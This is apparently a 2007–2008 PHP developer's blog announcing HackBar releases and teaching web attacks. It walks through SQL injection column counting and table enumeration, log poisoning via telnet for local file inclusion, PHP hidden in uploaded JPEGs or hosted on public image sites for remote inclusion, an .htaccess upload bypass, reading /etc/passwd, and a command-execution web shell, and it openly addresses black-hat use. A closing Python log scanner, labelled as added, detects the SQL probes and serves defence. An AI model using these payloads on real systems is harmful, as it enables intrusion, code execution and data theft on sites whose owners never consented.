Devels playground<br />The not so daily rants of a PHP developer, by Johan Adriaans<br /><br /><span style="font-weight: bold;">HackBar 1.4.1 beta release!</span> (2008-11-06)<br /><br />Finally! The update we have been waiting for!<br /><br />It still needs a lot of testing, so I'm releasing this as a beta, but it should work fine!<br /><br />Fixed:<br />- The "OSX toolbar not showing" bug!!<br />- Better layout for INT/HEX addition/subtraction<br />- A few minor translation bugs<br /><br />New features:<br />- Add/subtract octal<br />- Add/subtract alphabetical (a-z)<br />- Add/subtract alphanumeric (a-z 0-9)<br />- "Strip spaces" function, removes all space characters from the selected string<br />- Convert characters to hex and back in 3 formats (00ff00ff, 00:ff:00:ff and 00 ff 00 ff)<br /><br />Any bugs / comments can be mailed to: johan.adriaans@gmail.com or posted as a comment below.<br /><br /><a href="http://www.izi-services.nl/downloads/hackbar_1.4.1.xpi">Download HackBar 1.4.1 here</a><br /><br />Have fun!<br /><br /><span style="font-weight: bold;">NEW! Hackbar 1.3.2!</span> (2008-07-08)<br /><br />Finally! It has arrived! It took me some time, but here is the new HackBar plugin.<br /><br />Actually.. I finished it a month ago, but the Mozilla testers are very busy at the moment, so my plugin is still being tested.. They are doing a great job! 
But I decided to release it here for the people who need this plugin to work in FF3 (I had loads of mail and comments, thanks!)<br /><br /><a href="http://www.izi-services.nl/downloads/hackbar_1-3-2.xpi">Download version 1.3.2 here!</a><br /><br />Please leave a comment if you like the new version!<br /><br />New features:<br /><ul><li>Added POST data manipulation (yay!)</li><li>Added Referrer string manipulation</li><li>Fixed tab behavior</li><li>Show / Hide hot key [F9]</li><li>Show / Hide tools menu item</li><li>Show / Hide toolbar button</li><li>Code revision (again)</li><li>New layout, for more menus and buttons</li><li>Added SHA-1 and SHA-256 hashing</li><li>Added ROT13.. (request :)</li><li>Added Hex +1 and -1 buttons</li><li>Added a bunch of useful SQL injection strings and tricks</li><li>Added a bunch of useful XSS strings and tricks</li><li>Added add/stripslashes</li><li>.. and a few small things and fixes</li></ul><br /><span style="font-weight: bold;">Screenshots:</span><br /><span style="font-style: italic;">[Screenshot: New look and feel]</span><br /><span style="font-style: italic;">[Screenshot: More stuff! In drop-down menus]</span><br /><span style="font-style: italic;">[Screenshot: More of everything! (More encryptions (sha1/2))]</span><br /><span style="font-style: italic;">[Screenshot: Edit post data on the fly!]</span><br /><br />Have fun!<br /><br /><span style="font-weight: bold;">SQL injection: Getting the table names</span> (2008-01-07)<br /><br />Yep, this is a big issue. There are a few good tricks that will allow you to query for this information, especially in M$SQL. MySQL has a few small tricks as well, but this 'feature' was introduced in version 5 and is disabled on some servers.<br /><br /><span style="font-weight: bold;"># MySQL and the INFORMATION_SCHEMA database</span><br /><br />Now this neat feature was introduced in MySQL 5. It's a database containing.. information about all databases, tables, columns, fields, privileges, keys.. you name it! The best thing is, the default setting is to allow normal users read rights to this database. 
It CAN be disabled by a MySQL administrator, but most MySQL 5 servers I have seen are 'vulnerable'.<br /><br />Detailed information can be found here: <a href="http://dev.mysql.com/doc/refman/5.0/en/information-schema.html">http://dev.mysql.com/doc/refman/5.0/en/information-schema.html</a><br /><br />Here is a small example from the MySQL command line (<span style="font-family:courier new;">TABLE_SCHEMA</span> means 'database'):<br /><pre>mysql&gt; SELECT `TABLE_NAME` FROM `INFORMATION_SCHEMA`.`TABLES` WHERE `TABLE_SCHEMA` = 'mysql';
+---------------------------+
| TABLE_NAME                |
+---------------------------+
| columns_priv              |
| db                        |
| func                      |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| proc                      |
| procs_priv                |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
17 rows in set (0.06 sec)</pre><br />I guess you get the point here.. using this method in a union select query gets you all the information you need.<br /><br /><br /><span style="font-weight: bold;"># M$SQL SysObjects table</span><br /><br />In M$SQL we have something way better! The SysObjects table is a table containing all information about all objects created in the database. As far as I know there is no way of disabling a normal user's access to this table. A simple example (look for a (U)ser table starting with 'user'):<br /><pre>SELECT name FROM sysObjects WHERE type = 'U' AND name LIKE 'user%'</pre><br /><span style="font-weight: bold;"># 'Social' engineering</span><br /><br />If all else fails, 'social' engineering is the way to go!<br />This can be very tedious and it's pretty hard to keep up, but it almost never fails! You can make a very educated guess about what the database tables are, if you look closely enough. I usually start at a login form. If the user and password fields are named 'user' and 'password', the database layout will probably be:<br /><ol><li>Pretty default.. the table is probably something like: user(s), login, account(s) etc..</li><li>Database and table names are probably English</li></ol>Now if the developer chose to name these fields 'usr' and 'passwd', we should look at some other table / column names, and if these fields are in a non-English language, take it from there.. 
(and good luck ;)<br /><br />If you have some visual feedback from your SQL injection you can query for the database() and user() values.<br /><br /><span style="font-family:courier new;">SELECT database(), user();</span><br /><br />This too will give you some basic information about the developer's naming standards.<br /><br />If you still can't find any tables, it's probably a good idea to start thinking about table prefixes. This is somewhat outdated but still often used. Now what kind of prefix are we looking for? Most of them are 3-letter combinations followed by an underscore: acronyms for software packages or company names. Only very seldom do I find a site that uses the 'tbl_' prefix. But it did happen .. once ;)<br />Find out the developer's name, what the CMS system is called, what the site itself is called, and try a few acronyms.<br /><br />--------<br /><br />All this guessing around might seem to be based on a whole lot of luck, but it really isn't. In my time as a security auditor I found only one single website that had such obscure table names that I could not detect any user tables.<br /><br />It might take you a few hours, but you will get there. Trust me. ;)<br /><br />Oh, and don't forget, table names are case insensitive! ;)<br /><br /><span style="font-weight: bold;">Union select column count</span> (2007-08-07)<br /><br />A lot of people seem to be asking around for a way to detect the number of columns needed for a successful 'union select' injection. It might be old news for a lot of people, but others are still wrestling with pure guessing. So here goes nothing ;)<br /><br />When trying to execute a union select, make sure you are on a MySQL 4 or higher server! Union selects will not work on MySQL 3 or lower.<br /><br />O.k. 
let's take the following news query:<br /><span style="font-family:courier new;">SELECT * FROM `news` WHERE `news_id` = 121</span><br /><br />The URL to access this query is: /news.php?news_id=121<br /><br />So our injection point in this query is '121'.<br /><br />Now let's find out if news_id is injectable.<br /><span style="font-weight: bold;">test:</span> /news.php?news_id=121 and 1=1<br /><span style="font-weight: bold;">result needed: </span>success<br /><br /><span style="font-weight: bold;">test:</span> /news.php?news_id=121 and 1=0<br /><span style="font-weight: bold;">result needed: </span>empty page<br /><br />Version 4 or higher?<br /><span style="font-weight: bold;">test:</span> /news.php?news_id=121 and version() &gt;= 4<br /><span style="font-weight: bold;">result needed: </span>success<br /><br />Now comes the cool part. We know we can order data using column names, but we can also order our result set using column numbers. We can use this knowledge to test the number of columns used in the query.<br /><br />Does the column / order trick work? 
(order by the first column)<br /><span style="font-weight: bold;">test:</span> /news.php?news_id=121 order by 1/*<br /><span style="font-weight: bold;">result needed: </span>success<br /><br />More than 10 columns?<br /><span style="font-weight: bold;">test:</span> /news.php?news_id=121 order by 10/*<br /><span style="font-weight: bold;">result needed: </span>success / failure, depending on the number of columns.<br /><br />More than 20 columns?<br /><span style="font-weight: bold;">test:</span> /news.php?news_id=121 order by 20/*<br /><span style="font-weight: bold;">result needed: </span>success / failure, depending on the number of columns.<br /><br />etc...<br /><br />Now let's say there were 12 columns in the news table.<br /><span style="font-weight: bold;">test:</span> /news.php?news_id=121 order by 11/* -- Succeeded<br /><span style="font-weight: bold;">test:</span> /news.php?news_id=121 order by 12/* -- Succeeded<br /><span style="font-weight: bold;">test:</span> /news.php?news_id=121 order by 13/* -- Failed<br /><br />Joy! So 12 it is. Now you can easily inject your union select query. ;)<br /><span style="font-weight: bold;">Union Select:</span> <span style="font-family:courier new;">/news.php?news_id=12 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12/*</span><br /><br />Good luck ;)<br /><br /><span style="font-weight: bold;">Local file inclusion tricks</span> (2007-08-04)<br /><br />I keep on ranting about file inclusion while this is not something we see every day. I promise this will be my last post on this subject for a while :)<br /><br />First off, if you did no reconnaissance and you don't really know where you are on the file system but you do know where to go, don't worry about the number of ../ you're using. You can't go beyond the root of the file system; the rest of the ../'s will just be ignored. 
So if you are in /var/www/vhosts/domain.com/httpdocs and you try to include ../../../../../../../../../../etc/passwd, it will work fine.<br /><br />Now to actually include some PHP code! There are a few things you can do. Of course you could try to include external files, which would be the easy way to go.. but some administrators turn this feature off in the php.ini.<br /><br /><br /><span style="font-weight: bold;">// ----- 1: apache error_log injection -----</span><br />Inject PHP code into the apache error log.<br /><pre>$ telnet xxx.xxx.xxx.xxx 80
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.
GET /&lt;?php phpinfo(); ?&gt; HTTP/1.0</pre><br />After that you can include the error log file. The embedded PHP code will be executed. A few places to look for the error log file:<br />/var/log/httpd/error_log<br />/usr/local/apache/log/error_log<br />/usr/local/apache2/log/error_log<br />etc..<br /><br /><br /><span style="font-weight: bold;">// ----- 2: Malicious image upload -----</span><br />When the website allows its users to upload images (like avatars), you could use the method explained in my previous post, <a href="http://devels-playground.blogspot.com/2007/08/safe-remote-file-inclusion.html">"'Safe' remote file inclusion"</a>, to upload a malicious image.<br /><br /><br /><span style="font-weight: bold;">// ----- 3: Send e-mail -----</span><br />This is actually pretty hard to exploit, although it IS possible. You could of course try to send an e-mail to the web server user (e.g. apache@hostname) and include /var/spool/mail/apache. This method never worked for me, and I don't think any up-to-date Linux system supports this 'feature'.<br /><br />The second method is somewhat elaborate. 
I will explain it using qmail examples, but most mail servers support this feature.<br /><br />You will need to include the maillog file. This is often located at /var/log/maillog. Now to inject some PHP code, look at the following example:<br /><br /><pre>root@test:/# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 hidden.domain.com ESMTP
HELO
250 hidden.domain.com
MAIL FROM: anything &lt;?phpinfo();?&gt;
250 ok
RCPT TO: non-existing@user.com
250 ok
DATA
354 go ahead
Subject: phpInjectionTest
.
250 ok 1186501618 qp 7063
quit
221 hidden.domain.com
Connection closed by foreign host.
root@test:/# grep phpinfo /var/log/maillog
Aug 7 17:46:59 test qmail: 1186501618.685225 info msg 3903353: bytes 198 from &lt;?phpinfo();?&gt; qp 7086 uid 2020
Aug 7 17:46:59 test qmail-remote-handlers[7090]: from=?php-phpinfo();?
root@test:/# echo "&lt;?phpinfo();?&gt;" | php</pre><br />The above steps are:<br /><ol><li>Telnet into the mail server.</li><li>Fake the sender address: Anything &lt;?phpinfo();?&gt;. (Spaces are replaced by underscores, so you need to avoid those.)</li><li>Look for the phpinfo string in the log file.</li><li>Test it in PHP.</li></ol>The third method is to send a real email to a real user and include the mail file. This might be a bit hard because you will have to guess the filename. The default location for the qmail files is:<br />/var/qmail/mailnames/[domain.com]/[user]/Maildir/new/<br />And the files look like: 1186501037.4564.server.domain.com (meaning [timestamp].[PID].[hostname]).<br /><br />The filename can be guessed using the maillog; the approximate timestamp and PID will show up in this log file, although it's pretty hard to read if you're not familiar with this log format.<br /><br /><br /><span style="font-weight: bold;">// ----- Conclusion -----</span><br />There are a lot of cool ways to include PHP snippets on a vulnerable server; the easiest one is to write it to the error_log file. This file is written by the web server and easily accessible (without the open_basedir restrictions, of course).<br /><br /><span style="font-weight: bold;">// ----- What to inject?! -----</span><br />The best start is to inject something like:<br /><span style="font-family:courier new;">&lt;?system($_GET['x']);?&gt;</span><br />This allows you to execute any command on the server using the x _GET value. 
After that you're practically in.<br /><br /><span style="font-weight: bold;">'Safe' remote file inclusion</span> (2007-08-03)<br /><br />As mentioned in my previous post, "PHP Image uploaders", it is possible to embed PHP code in a normal jpeg image. With the valid extension this will upload in any image upload script. It will be treated like any normal image. The embedded PHP code will stay untouched unless the image is resized or pulled through ImageMagick / GDlib for any reason. These libs will not trigger any errors; they just strip off the excess data (meaning the embedded PHP code ;)<br /><br />When executing or including these PHP files, the image data blob will be printed to the screen, which is slightly annoying.. but the PHP code will also be executed. Some black hat readers might see the opportunity here. When you find a remote file inclusion, and you want to inject some PHP code, it's often tricky to host it on:<br />1. Your own server<br />2. A 'hacked' server (which I don't know anything about)<br /><br />So a simple option might be: write your PHP script, embed it into a jpeg file, and host it on any open image upload server. I tested it on imageshack, and it seems to work there. The only requirement is that the file should not be resized or changed in any way.<br /><br />After this you can include the .jpg file, and the PHP code embedded in the image will be executed.<br /><br />Here is a simple test you can run:<br />Get your favorite image.. called image.jpg, and go a little something like this:<br /><pre>$ echo "&lt;?php phpinfo(); ?&gt;" &gt;&gt; image.jpg
$ echo "&lt;?php include('image.jpg') ?&gt;" &gt; test.php</pre>Now open test.php in your browser, and behold! phpinfo() output.. with a bunch of nasty binary characters above it.<br /><br />Here is a demo file containing phpinfo(): <a href="http://img258.imageshack.us/img258/3822/gnarfmh9.jpg">http://img258.imageshack.us/img258/3822/gnarfmh9.jpg</a><br /><br /><span style="font-weight: bold;">PHP Image uploaders</span> (2007-06-26)<br /><br />Image uploads are pretty common these days; you get them in most forums, weblogs, community sites etc. There are basically 2 methods of determining if the uploaded file is an actual image.<br /><br /><span style="font-weight: bold;">1:</span> Check the file extension. This should be gif, jpg or png.<br /><span style="font-weight: bold;">2:</span> Check the file layout, using the PHP getimagesize() function, which is way cooler, cuz it is.<br /><br />If by chance the developer wasn't paying attention and doesn't check the extension properly, but does use the getimagesize function to determine the image type, you can upload a 'special' file that passes all PHP image checks and still executes the embedded PHP.<br /><br />Just take a basic jpeg image (yes, your avatar will do), open it in your favorite hex editor, open your PHP file next to it, and copy-paste the PHP hex data below the image hex data.<br /><br />Next, rename file.jpg to file.php, and try to upload it.<br /><br />The thing with jpeg is, it's not bothered by excess data. The jpeg header takes care of that. A PHP file just shows its contents, until it finds those cute PHP tags. So when opening this 'image' in a browser, it will be executed like a normal PHP file.<br /><br />I used this image spoof about 20 times now, and it worked about 5 times. 
So it's a long shot, but surely worth a try.<br /><br /><span style="font-weight: bold;">PS:</span><br />If it doesn't work, try to upload a .htaccess file containing: <span style="font-style: italic;">AddType application/x-httpd-php .jpg</span><br />and uploading your .php file as a .jpg file. Because of the weird filename layout (.htaccess == no filename and a suspiciously long file extension) some upload checks let it pass through (older versions of FCKeditor, for example).<br /><br /><span style="font-weight: bold;">Security and its ethics</span> (2007-06-26)<br /><br /><span style="font-style: italic;">'Cool, I hacked some site! I must now tell the owner (whoever that may be) how he should fix his bogus security.. and of course, what a 1337 H@xor I am!'..</span><br /><br />When I find SQL injections, most of the time I don't even bother telling the owner of the site, unless of course it's something big and important, and lives are (or my money is) at stake. Most of the time you get a lame reply or none at all.. and this made me think.<br /><br />Finding security leaks is fun for me; it's a challenge. When I'm actually IN, I lose interest real fast. The rush you get, when you get closer and closer, is the best there is! The thing is.. telling the owner you were in his backend, proving it with pretty screenshots, is roughly equivalent to forcing your way into his living room and sending him a postcard afterwards (with you in it.. on his couch.. watching his p0rn). What more can we expect but a pale-faced "Thank you for not telling anyone.."?<br /><br />This is different for the bigger companies. They have the beauty of bureaucracy! This is just a fancy word for: "<span style="font-style: italic;">Hi Boss, I didn't do it, it was that guy over there.. oh wait.. he quit a few weeks ago.. you want me to fix it? I'd be happy to!</span>"<br /><br />This is even more different for the really big companies with a security team on top. They tend to sue you to death, or if they are really impressed, hire you! (probably worse)<br />Just picture yourself in a bank vault, explaining your 'bendy paperclip technique' that allowed you to open the door while disabling any surrounding cameras or alarms.. pure horror!<br /><br />So.. it's better not to say anything.. is it? Well no.. the best thing I can think of is: just be real careful when you do tell. Don't try to be the all-knowing hacker that saved them from a pitiful doom. Just tell them what you do, why you do it, and... what you did :)<br /><br />Or even better, contact them in advance and ask them if it's ok. I did it a few times, and it works great. The only problem is that this approach kind of kills the ninja feeling of it all.. but that's just me, I guess.<br /><br /><span style="font-weight: bold;">Hackbar 1.1.1</span> (2007-06-26)<br /><br />I have released the new version of the HackBar Firefox plugin. Well.. not exactly.. I released it a month ago, but it should be on this blog, so here it is.<br /><br />&gt;&gt; So... why the lame name?<br />&lt;&lt; Well.. it started out as a joke. I wanted to write a Firefox plugin, and I was fed up with the confusing and unreadable URL when performing SQL injections. So a lame textarea toolbar was born. I decided to call it HackBar.. cuz, that's what it helps you do.. doesn't it? After a while I saw the error of my ways. The first problem was getting it through the Firefox plugin people. That took about a month.. And now, it's not just my toy, it's anyone's toy.. And apparently it's my problem that it's not available in Chinese.. 
or some other language I can't read.<br /><br />Anyway, here's the link: <a href="https://addons.mozilla.org/en-US/firefox/addon/3899">https://addons.mozilla.org/en-US/firefox/addon/3899</a><br /><br /><br /><span style="font-weight: bold;">Hackbar 1.1.1 description</span><br /><br /><pre># New features
 - Show / Hide hotkey [F9]
 - Tab sensitive
 - Auto load, split and focus when pressing the hotkey on a new URL.
 - Localized (English and Dutch for now)
 - Textarea width set to 100% (removed dragbar)
 - Complete code revision (OO based instead of functions)

# In general
This toolbar will help you in testing SQL injections, XSS holes and site security. It is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site. Its main purpose is to help a developer do security audits on his code. If you know what you're doing, this toolbar will help you do it faster. If you want to learn to find security holes, you can also use this toolbar, but you will probably also need a book, and a lot of Google :)

# The advantages are:
 - Even the most complicated URLs will be readable
 - The focus will stay on the textarea, so after executing the URL (ctrl+enter) you can just go on typing / testing
 - The URL in the textarea is not affected by redirects.
 - I tend to use it as a notepad :)
 - Useful tools like on-the-fly uu/url decoding etc.
 - All functions work on the currently selected text.

# Load url (alt a)
This loads the URL of the current page into the textarea.

# Split url (alt s)
When this button is clicked, the URL/text in the textarea will be split into multiple lines using the ? and &amp; characters.

# Execute (alt x, ctrl enter)
This will execute the current URL in the textarea; I mostly use ctrl+enter.

# INT -1 (alt -)
First select a number in the textarea and press this button; the number will be lowered by 1 and the URL will be loaded.

# INT +1 (alt +)
Again, first select a number in the textarea and press this button; 1 will be added to the number and the URL will be loaded.

# MD5 Hash (alt m)
This is a standard hashing method, often used as an encryption method for passwords. It will MD5 hash the currently selected string.

# MySQL CHAR() (alt y)
If quotes are escaped but you did find an SQL injection that's exploitable, you can use this button to convert, let's say:
load_file('/etc/passwd') --&gt; load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100))
thus omitting the use of quotes to load a file.
You can also use this on:
WHERE foo LIKE ('%bar%') --&gt; WHERE foo LIKE (CHAR(37, 98, 97, 114, 37))

# MsSQL CHAR() (alt q)
Same story as MySQL CHAR(); MsSQL has a slightly different CHAR syntax:
--&gt; WHERE foo LIKE (CHAR(37) + CHAR(98) + CHAR(97) + CHAR(114) + CHAR(37))

# Base64 encode / decode
Base64 encoding (UU) is often used to store data (like a return URL etc.). This will help you to read those values.

# URLencode / decode
This will encode or decode the currently selected characters to URL-safe characters. I mostly use it to end a query with # (%23) when in a pseudo path where I can't use /* or --</pre><br /><br /><span style="font-weight: bold;">Cool! Another blog full of crap... about stuff!</span> (2007-06-26)<br /><br />Yep.. you're so right!<br /><br />I'm a PHP developer, I'm interested in lots of things, mostly web development, and I needed an outlet. So here we are.<br /><br />Security is something I like to play with; it's nice out-of-the-box thinking. A fitting description would be "a jigsaw puzzle without the pretty picture.." But that would just be plain silly.<br /><br />Next to that I tend to release some scripts and applications onto the world...<br />So now you know.. bear with me :)
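Added example, not from the blog: the defender's counterpart to the probe sequence walked through in the "Union select column count" and "SQL injection: Getting the table names" posts and the CHAR()/load_file quote-avoidance from the Hackbar 1.1.1 description above. It parses constructed Apache combined-log lines (documentation-range IPs, invented function names) and flags, per source IP, the and 1=1 / and 1=0, version(), order by N, union select, INFORMATION_SCHEMA / sysobjects, CHAR( and load_file( patterns together with the /* -- %23 comment terminators.

```python
"""Log-side detection of the SQL injection probes described in the posts above.

Added example, not part of the blog: the Apache combined-log lines below are
constructed, the IPs are documentation ranges, and all function names are mine.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# One regex per technique the posts describe; matched against the decoded,
# lower-cased, whitespace-normalised query string.
SIGNATURES = {
    "boolean_probe": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+\b"),        # and 1=1 / and 1=0
    "version_probe": re.compile(r"\bversion\s*\(\s*\)\s*[<>=]"),          # and version() >= 4
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b"),                # order by 12/*
    "union_enum": re.compile(r"\bunion\s+(all\s+)?select\b"),             # union select 1,2,...
    "schema_enum": re.compile(r"\binformation_schema\b|\bsysobjects\b"),  # table-name lookup
    "char_obfuscation": re.compile(r"\bchar\s*\(\s*\d+"),                 # CHAR(47,101,...) quote-avoidance
    "file_read": re.compile(r"\bload_file\s*\("),                         # load_file(...)
    "comment_tail": re.compile(r"(/\*|--|#)\s*$"),                        # /* , -- or %23 terminator
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def normalise_query(target):
    """Decode the request target the way the application would see it."""
    query = urlsplit(target).query
    for _ in range(2):               # two passes catch double-encoded payloads
        query = unquote_plus(query)  # '+' is a space in URL/form encoding
    query = query.lower()
    # A closed /* ... */ is just whitespace to MySQL ('union/**/select'), so treat
    # it as such; an unterminated trailing /* survives for the comment_tail check.
    query = re.sub(r"/\*.*?\*/", " ", query)
    return re.sub(r"\s+", " ", query).strip()


def classify(line):
    """Parse one log line and return a record with the matched signature names,
    or None when the line is not in combined-log format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = normalise_query(m.group("target"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    return {
        "ip": m.group("ip"),
        "path": urlsplit(m.group("target")).path,
        "status": int(m.group("status")),
        "hits": hits,
        "query": query,
    }


def find_probe_sequences(lines):
    """Group flagged requests by source IP, in log order.  One IP walking through
    'and 1=1', 'and 1=0', 'order by N' and then 'union select 1,2,...' is the
    column-count procedure from the post; it deserves an alert as a sequence even
    though most of the individual requests returned 200."""
    by_ip = {}
    for line in lines:
        rec = classify(line)
        if rec and rec["hits"]:
            by_ip.setdefault(rec["ip"], []).append(rec)
    return by_ip


# Constructed sample: one source replaying the probes from the posts, one benign visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Aug/2007:21:31:02 +0200] "GET /news.php?news_id=121 HTTP/1.1" 200 5120
203.0.113.7 - - [07/Aug/2007:21:31:09 +0200] "GET /news.php?news_id=121%20and%201=1 HTTP/1.1" 200 5120
203.0.113.7 - - [07/Aug/2007:21:31:15 +0200] "GET /news.php?news_id=121%20and%201=0 HTTP/1.1" 200 312
203.0.113.7 - - [07/Aug/2007:21:31:22 +0200] "GET /news.php?news_id=121%20and%20version()%20>=%204 HTTP/1.1" 200 5120
203.0.113.7 - - [07/Aug/2007:21:31:30 +0200] "GET /news.php?news_id=121%20order%20by%2012/* HTTP/1.1" 200 5120
203.0.113.7 - - [07/Aug/2007:21:31:33 +0200] "GET /news.php?news_id=121%20order%20by%2013/* HTTP/1.1" 500 312
203.0.113.7 - - [07/Aug/2007:21:32:01 +0200] "GET /news.php?news_id=121%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12/* HTTP/1.1" 200 4800
203.0.113.7 - - [07/Aug/2007:21:32:40 +0200] "GET /news.php?news_id=121%20and%201=0%20union%20select%20TABLE_NAME,2,3,4,5,6,7,8,9,10,11,12%20from%20INFORMATION_SCHEMA.TABLES%23 HTTP/1.1" 200 4900
203.0.113.7 - - [07/Aug/2007:21:33:05 +0200] "GET /news.php?news_id=121%20and%201=0%20union%20select%20load_file(CHAR(47,101,116,99,47,112,97,115,115,119,100)),2,3,4,5,6,7,8,9,10,11,12/* HTTP/1.1" 200 6100
198.51.100.9 - - [07/Aug/2007:21:35:00 +0200] "GET /news.php?news_id=122 HTTP/1.1" 200 5010
"""

if __name__ == "__main__":
    for ip, recs in find_probe_sequences(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {len(recs)} flagged requests")
        for r in recs:
            print(f"  {r['status']} {r['path']} -> {', '.join(r['hits'])}")
```

Run as-is it lists the eight flagged requests from 203.0.113.7 and nothing for the benign visitor; the same functions can be fed a real access log line by line.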